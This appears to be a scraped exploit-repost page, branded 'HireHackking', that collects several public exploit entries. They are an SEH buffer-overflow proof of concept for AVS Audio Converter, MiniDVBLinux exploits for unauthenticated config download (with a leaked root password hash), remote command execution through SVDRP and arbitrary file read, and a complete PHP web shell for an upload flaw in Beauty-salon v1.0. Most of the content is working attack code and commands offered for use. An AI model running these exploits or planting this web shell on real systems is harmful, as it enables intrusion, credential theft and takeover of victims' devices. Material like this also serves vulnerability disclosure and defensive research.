# Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH) # Discovered by: Yehia Elghaly - Mrvar0x # Discovered Date: 2022-10-16 # Tested Version: 10.3.1.633 # Tested on OS: Windows 7 Professional x86 #pop+ret Address=005154E6 #Message= 0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe) # The only module that has SafeSEH disabled. # Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | # 0x00400000 | 0x01003000 | False | False | False | False | False | #Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes. #Buffer = '\x41'* 260 #nSEH = '\x42'*4 #SEH = '\x43'*4 #ESI = 'D*44' # ESI Overwrite #buffer = "A"*260 + [nSEH] + [SEH] + "D"*44 #buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44 # Rexploit: # Generate the 'evil.txt' payload using python 2.7.x on Linux. # Open the file 'evil.txt' Copy. # Paste at'Output Folder and click 'Browse'. #!/usr/bin/python -w filename="evil.txt" buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44 textfile = open(filename , 'w') textfile.write(buffer) textfile.close()
HireHackking

MiniDVBLinux <=5.4 - Config Download Exploit

HACKER · %s · %s

# Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit # Exploit Author: LiquidWorm Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application is vulnerable to unauthenticated configuration download when direct object reference is made to the backup function using an HTTP GET request. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access. ==================================================================== /var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh: ------------------------------------------------------------ 01: <? 02: if [ "$GET_action" = "getconfig" ]; then 03: . /etc/rc.config 04: header "Content-Type: application/x-compressed-tar" 05: header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz" 06: /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null 07: cat /tmp/backup_config_$$.tgz 08: rm -rf /tmp/backup_config* 09: exit 10: fi 11: ?> 12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div> ==================================================================== Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5713 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php 24.09.2022 -- > curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz > mkdir configdir > tar -xvzf config.tgz -C .\configdir > cd configdir && cd etc > type passwd root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh daemon:!:1:1::/: ftp:!:40:2:FTP account:/:/bin/sh user:!:500:500::/home/user:/bin/sh nobody:!:65534:65534::/tmp: _rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin >
HireHackking
# Exploit Title: MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE) # Exploit Author: LiquidWorm MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application allows the usage of the SVDRP protocol/commands to be sent by a remote attacker to manipulate and/or control remotely the TV. Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5714 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php 24.09.2022 -- Send a message to the TV screen: curl http://ip:8008/?site=commands&section=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU! 220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8 250 Message queued 221 mld closing connection For more commands: - https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands
HireHackking

Beauty-salon v1.0 - Remote Code Execution (RCE)

HACKER · %s · %s

## Exploit Title: Beauty-salon v1.0 - Remote Code Execution (RCE) ## Exploit Author: nu11secur1ty ## Date: 10.12.2022 ## Vendor: https://code4berry.com/projects/beautysalon.php ## Software: https://code4berry.com/project%20downloads/beautysalon_download.php ## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt ## Description: The parameter `userimage` from Beauty-salon-2022 suffers from Web Shell-File Upload - RCE. NOTE: The user permissions of this system are not working correctly, and the function is not sanitizing well. The attacker can use an already created account from someone who controls this system and he can upload a very malicious file by using this vulnerability, or more precisely (no sanitizing of function for edit image), for whatever account, then he can execute it from anywhere on the external network. Status: HIGH Vulnerability [+] Exploit: ```php <!-- Project Name : PHP Web Shell --> <!-- Version : 4.0 nu11secur1ty --> <!-- First development date : 2022/10/05 --> <!-- This Version development date : 2022/10/05 --> <!-- Moded and working with PHP 8 : 2022/10/05 --> <!-- language : html, css, javascript, php --> <!-- Developer : nu11secur1ty --> <!-- Web site : https://www.nu11secur1ty.com/ --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" " http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html" charset="euc-kr"> <title>PHP Web Shell Ver 4.0 by nu11secur1ty</title> <script type="text/javascript"> function FocusIn(obj) { if(obj.value == obj.defaultValue) obj.value = ''; } function FocusOut(obj) { if(obj.value == '') obj.value = obj.defaultValue; } </script> </head> <body> <b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?></b><br><br> HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br> REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br> <br> <form name="cmd_exec" method="post" action="http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>"> <input type="text" name="cmd" size="70" maxlength="500" value="Input command to execute" onfocus="FocusIn(document.cmd_exec.cmd)" onblur="FocusOut(document.cmd_exec.cmd)"> <input type="submit" name="exec" value="exec"> </form> <?php if(isset($_POST['exec'])) { exec($_POST['cmd'],$result); echo '----------------- < OutPut > -----------------'; echo '<pre>'; foreach($result as $print) { $print = str_replace('<','<',$print); echo $print . '<br>'; } echo '</pre>'; } else echo '<br>'; ?> <form enctype="multipart/form-data" name="file_upload" method="post" action="http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>"> <input type="file" name="file"> <input type="submit" name="upload" value="upload"><br> <input type="text" name="target" size="100" value="Location where file will be uploaded (include file name!)" onfocus="FocusIn(document.file_upload.target)" onblur="FocusOut(document.file_upload.target)"> </form> <?php if(isset($_POST['upload'])) { $check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']); if($check == TRUE) echo '<pre>The file was uploaded successfully!!</pre>'; else echo '<pre>File Upload was failed...</pre>'; } ?> </body> </html> ``` # Proof and Exploit: [href](https://streamable.com/ewdmoh) # m0e3: [href]( https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html ) System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

MiniDVBLinux 5.4 - Arbitrary File Read

HACKER · %s · %s

# Exploit Title: MiniDVBLinux 5.4 - Arbitrary File Read # Exploit Author: LiquidWorm #!/usr/bin/env python3 # # # MiniDVBLinux 5.4 Arbitrary File Read Vulnerability # # # Vendor: MiniDVBLinux # Product web page: https://www.minidvblinux.de # Affected version: <=5.4 # # Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple # way to convert a standard PC into a Multi Media Centre based on the # Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this # Linux based Digital Video Recorder: Watch TV, Timer controlled # recordings, Time Shift, DVD and MP3 Replay, Setup and configuration # via browser, and a lot more. MLD strives to be as small as possible, # modular, simple. It supports numerous hardware platforms, like classic # desktops in 32/64bit and also various low power ARM systems. # # Desc: The distribution suffers from an arbitrary file disclosure # vulnerability. Using the 'file' GET parameter attackers can disclose # arbitrary files on the affected device and disclose sensitive and system # information. # # Tested on: MiniDVBLinux 5.4 # BusyBox v1.25.1 # Architecture: armhf, armhf-rpi2 # GNU/Linux 4.19.127.203 (armv7l) # VideoDiskRecorder 2.4.6 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5719 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php # # # 24.09.2022 # import requests import re,sys #test case 001 #http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT if len(sys.argv) < 3: print('MiniDVBLinux 5.4 File Disclosure PoC') print('Usage: ./mldhd_fd.py [url] [file]') sys.exit(17) else: url = sys.argv[1] fil = sys.argv[2] req = requests.get(url+'/?site=about&name=ZSL&file='+fil) outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group() print(outz.replace('<pre>','').replace('</pre>',''))